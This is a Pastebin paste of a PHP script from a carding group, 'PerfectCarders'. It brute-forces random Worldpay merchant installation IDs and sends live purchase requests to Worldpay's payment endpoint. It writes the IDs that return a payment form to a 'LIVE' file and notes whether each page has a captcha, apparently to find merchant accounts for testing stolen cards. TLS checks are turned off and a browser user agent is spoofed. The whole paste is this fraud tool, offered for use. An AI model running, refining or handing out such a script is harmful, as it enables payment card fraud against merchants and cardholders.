Arkanun

Untitled

Sep 18th, 2020
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.66 KB | None | 0 0
  1. <?php
  2. /***************************************************
  3. * ->> HHHHHAMMER WORLDPAY MERCHANT BOT CAPTOR <<__
  4. * Created by N1ghtm4R3 (@MrBanker)
  5. * Released _Date: 03/02/2018
  6. *
  7. * Powered by PerfectCarders
  8. * https://t.me/PerfectCarders
  9. ****************************************************/
  10.  
  11. ini_set("max_execution_time", 0);
  12. ini_set("memory_limit", "-1");
  13.  
  14. // bot config;
  15. $valor = "1.00"; // valor estatico || money;
  16. $moeda = "GBP"; // codigo iso moeda // currency;
  17. $oneLive = false; // true para parar o bot quando sair a primeira LIVE;
  18.  
  19. $dirLive = dirname(__FILE__) . "/WorldPay_LIVE_1_ao_999999.txt"; // caminho das LIVES;
  20.  
  21. print "\n###############################################";
  22. print "\n# >>>>>.HAMMER WORLDPAY MERCHANT BOT CAPTOR v1.1";
  23. print "\n# Created by Mr. Banker - PerfectCarders";
  24. print "\n###############################################\n";
  25. print "*** Aguarde...\n\n";
  26.  
  27. ob_start();
  28. for($i=0; $i = 1; $i++){
  29. $id = mt_rand(1, 499999);
  30. $url = "https://secure.worldpay.com/wcc/purchase?instId=".$id."&testMode=0&cartId=1&currency=".$moeda."&amount=".$valor."";
  31.  
  32. $ch = curl_init();
  33. curl_setopt($ch, CURLOPT_URL, $url);
  34. cURL_Setup($ch);
  35. $output = curl_exec($ch);
  36. $chInfo = curl_getinfo($ch);
  37. curl_close($ch);
  38.  
  39. if(!$chInfo["http_code"] != "200"){
  40. if(strpos($output, "NAME=PaymentID") !== false){
  41. if(strpos($output, "recaptcha") !== false){
  42. $captcha = "FOUND!";
  43. }else{
  44. $captcha = "NOT FOUND!";
  45. }
  46.  
  47. $live = "[+] STATUS: ".$chInfo["http_code"]." LIVE! => ".$chInfo["url"]."|CAPTCHA: $captcha";
  48. $fp = fopen($dirLive, "a+");
  49. fwrite($fp, $live . PHP_EOL);
  50. fclose($fp);
  51.  
  52. print $live."\n";
  53. if($oneLive){ break; }
  54. }else{
  55. print "[-] STATUS: ".$chInfo["http_code"]." DIE! => ".$chInfo["url"]."\n";
  56. }
  57. }else{
  58. print "[!] STATUS: ".$chInfo["http_code"]." => FALHA NA CONECXAO! RECONECTANDO EM 3 SEG...\n";
  59. sleep(3);
  60. continue;
  61. }
  62. ob_flush();
  63. flush();
  64. }
  65. ob_end_flush();
  66.  
  67. function cURL_Setup($set)
  68. {
  69. curl_setopt($set, CURLOPT_HTTPHEADER,
  70. array(
  71. "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
  72. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  73. "Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3",
  74. "Connection: keep-alive"
  75. ));
  76. curl_setopt($set, CURLOPT_SSL_VERIFYPEER, false);
  77. curl_setopt($set, CURLOPT_SSL_VERIFYHOST, false);
  78. curl_setopt($set, CURLOPT_RETURNTRANSFER, true);
  79. curl_setopt($set, CURLOPT_CONNECTTIMEOUT, 10);
  80. curl_setopt($set, CURLOPT_TIMEOUT, 20);
  81. }
  82. ?>
Add Comment
Please, Sign In to add comment